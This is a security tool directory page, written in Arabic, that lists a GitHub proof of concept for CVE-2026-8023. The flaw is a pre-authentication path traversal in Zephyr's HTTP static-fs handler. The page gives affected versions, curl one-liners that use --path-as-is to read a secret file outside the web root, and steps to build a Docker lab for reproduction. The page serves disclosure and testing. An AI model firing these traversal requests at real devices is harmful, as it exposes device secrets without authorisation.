Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-8023 — PoC لـ CVE-2026-8023: تقييد غير سليم لاسم المسار إلى دليل مقيد ('اجتياز المسار') | Kitploit
أدوات/GitHubGitHub/ret2c/cve-2026-8023
أمان الأنظمة المدمجةأمان إنترنت الأشياءتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويب
GitHubret2c/cve-2026-8023

CVE-2026-8023

PoC لـ CVE-2026-8023: تقييد غير سليم لاسم المسار إلى دليل مقيد ('اجتياز المسار')

عرض المستودع
منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الموقع الإلكتروني

CVE-2026-8023 — اجتياز المسار في HTTP static-fs في Zephyr (PoC)

اجتياز المسار قبل المصادقة في معالج static-fs لخادم HTTP في Zephyr (subsys/net/lib/http) عند استخدام مطابقة الموارد باستخدام حرف البدل (CONFIG_HTTP_SERVER_RESOURCE_WILDCARD=y) مع HTTP_RESOURCE_TYPE_STATIC_FS. يؤثر على كلٍّ من HTTP/1.1 و HTTP/2.

GHSA: GHSA-hch3-53g6-jj3h

  • النسخ المتأثرة: >= 4.0.0، < 4.3.1؛ >= 4.4.0، < 4.4.2
  • تم التأكيد على النسخة: b93e61d02d5cd08d2fc559feb0253f9de3491777 (v4.4.0-rc1-32-gb93e61d02d5)
  • أُدخلت في الالتزام: e55278a87be4e5534ba772b23e459882866bcd6d (2024-07-31)
  • الالتزام المُصلِح: zephyrproject-rtos/zephyr#108531
root@kitploit:~
curl --http1.1 --path-as-is -i "http://$URL/www/../device.env"
curl --http2-prior-knowledge --path-as-is -i "http://$URL/www/../device.env"

إعادة الإنتاج

root@kitploit:~
git clone https://github.com/zephyrproject-rtos/zephyr.git
cd zephyr && git checkout b93e61d02d5cd08d2fc559feb0253f9de3491777 && cd ..
west init -l zephyr
west update

# Copy the contents of this repo's pocs/ into zephyr/pocs/
docker build -f zephyr/pocs/Dockerfile.native-sim -t zephyr-httpfs-zdi .
docker run --rm -it -v "$PWD":/work -w /work zephyr-httpfs-zdi bash

# Inside container:
west build -p always -b native_sim/native/64 \
    zephyr/pocs/http_static_fs_native_sim \
    -- -DEXTRA_DTC_OVERLAY_FILE=ramdisk.overlay
./build/zephyr/zephyr.exe

يُثبّت إعداد الاختبار صورة LittleFS، ويكتب سرًا في /littlefs/device.env خارج جذر الويب الخاص بـ /littlefs/www/، ويوفّر مسار static-fs باستخدام البدل، ثم يُرسل أربعة طلبات loopback:

تنزيل الأداة
الاختبارالطلبالنتيجة المتوقعة
HTTP1_GLOB_TRAVERSALGET /www/../device.env (HTTP/1.1)200 + السر
HTTP1_ENCODED_TRAVERSALGET /www/%2e%2e/device.env (HTTP/1.1)404 (لا فك ترميز)
HTTP2_GLOB_TRAVERSAL:path = /www/../device.env (HTTP/2)بايتات السر
HTTP2_ENCODED_TRAVERSAL:path = /www/%2e%2e/device.env (HTTP/2)لا يوجد سر